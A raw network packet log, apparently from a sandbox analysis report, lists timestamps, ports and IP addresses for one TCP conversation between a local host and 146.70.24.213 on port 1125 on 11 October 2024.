Oct 11, 2024 16:53:30.451051950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.451167107 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.456219912 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.571368933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.617492914 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.661720991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.711205006 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.773736000 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.778721094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.778812885 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.783632994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.930175066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.976816893 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:31.020809889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:31.070522070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:31.133076906 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:31.138031006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:31.138174057 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:31.143033028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:31.258265972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:31.304950953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:31.348730087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:31.398662090 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:31.461319923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:31.466348886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:31.466464043 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:31.471290112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:31.905082941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:31.905966997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:31.906177044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:31.906336069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:31.906428099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.119406939 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.124577999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.125456095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.130661011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.243273973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.289314985 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.333849907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.383049011 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.446127892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.451427937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.451528072 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.456338882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.571557045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.617552996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.661896944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.711257935 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.773798943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.778870106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.778959036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.783808947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.906306982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:32.961240053 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:32.996296883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.039309978 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.117496014 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.122859001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.122931004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.127867937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.243129969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.289472103 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.333926916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.383138895 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.445858955 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.450876951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.450930119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.455816031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.570863962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.617544889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.661654949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.711175919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.773751974 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.778707981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.778774977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.783643007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.898844004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:33.945719004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:33.989335060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:34.039237976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.101881981 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.106859922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:34.106945992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.112170935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:34.227186918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:34.273760080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.317929029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:34.367449999 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.430022955 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.435048103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:34.435188055 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.440125942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:34.555511951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:34.601756096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.646137953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:34.695575953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.758127928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.763087034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:34.763158083 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:34.768033981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.195502043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.195602894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.195651054 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.195652962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.195700884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.305032969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.310621023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.310718060 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.316154957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.430442095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.477019072 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.521015882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.570693016 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.633212090 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.638319016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.638451099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.643436909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.758816957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.804898977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.849267960 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.898654938 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.961247921 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.966228962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:35.966335058 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:35.971278906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.086688042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.133126020 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:36.177324057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.226794958 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:36.289457083 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:36.295191050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.295262098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:36.300782919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.415210962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.461250067 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:36.505757093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.554908991 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:36.697165012 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:36.702238083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.702317953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:36.707314014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.820705891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.869028091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:36.911334038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:36.976895094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.068243980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.073113918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:37.073201895 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.078048944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:37.196300030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:37.242400885 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.286906004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:37.336294889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.398901939 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.404009104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:37.404139996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.409060955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:37.524152040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:37.570589066 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.614727974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:37.664330959 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.726938009 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.732045889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:37.732129097 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:37.736922026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:38.207925081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:38.208005905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:38.208089113 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:38.208192110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:38.208308935 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:38.321022034 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:38.326292038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:38.326776981 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:38.331706047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:39.461030006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:39.461056948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:39.461189985 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:39.461307049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:39.461354017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:39.461949110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:39.461990118 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:39.573668003 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:39.578727007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:39.578808069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:39.583980083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:39.696400881 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:39.742419004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:39.787230968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:39.850797892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:39.901217937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:39.906487942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:39.906553030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:39.911442041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.024663925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.070660114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.116342068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.164305925 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.226927996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.231923103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.232052088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.237337112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.354151011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.398648977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.444509029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.492433071 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.555288076 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.560324907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.560482979 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.565469980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.680337906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.726798058 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.771106958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.820605040 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.883182049 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.888066053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:40.888282061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:40.893145084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.008480072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.054908991 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.102998018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.148783922 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.226900101 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.231807947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.231898069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.237494946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.352510929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.398706913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.442881107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.492389917 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.555130959 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.560511112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.560570955 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.565589905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.681508064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.726906061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.772890091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.820524931 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.883101940 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.888607025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:41.888787031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:41.893779039 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.008335114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.054888964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.099220037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.148638964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.211203098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.216058016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.216101885 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.220957994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.336301088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.383033037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.427123070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.476788998 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.539431095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.544286013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.544357061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.549248934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.664628029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.711159945 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.755776882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.804879904 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.867479086 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.872473955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.872570038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:42.877612114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:42.992903948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:43.039282084 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:43.083444118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:43.133059025 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:43.195677996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:43.202780962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:43.202891111 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:43.209633112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:43.321258068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:43.367454052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:43.411818981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:43.461363077 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:43.523910046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:43.528851986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:43.528942108 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:43.535373926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:43.669240952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:43.711148977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:44.819932938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:44.821546078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:44.821605921 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:44.822439909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:44.822539091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:44.930165052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:44.935275078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:44.935364962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:44.940242052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.055315971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.101763964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.146075964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.195554018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.258317947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.263603926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.263712883 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.268626928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.383153915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.429920912 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.474216938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.523696899 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.586414099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.591315985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.591479063 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.596441031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.711529016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.758147001 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.802411079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.851825953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.914429903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.919497967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:45.919600964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:45.924459934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.040034056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.086504936 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.130593061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.179950953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.243335962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.248352051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.248500109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.253473043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.545749903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546188116 CEST	1125	49730	146.70.24.213	192.168.2.4
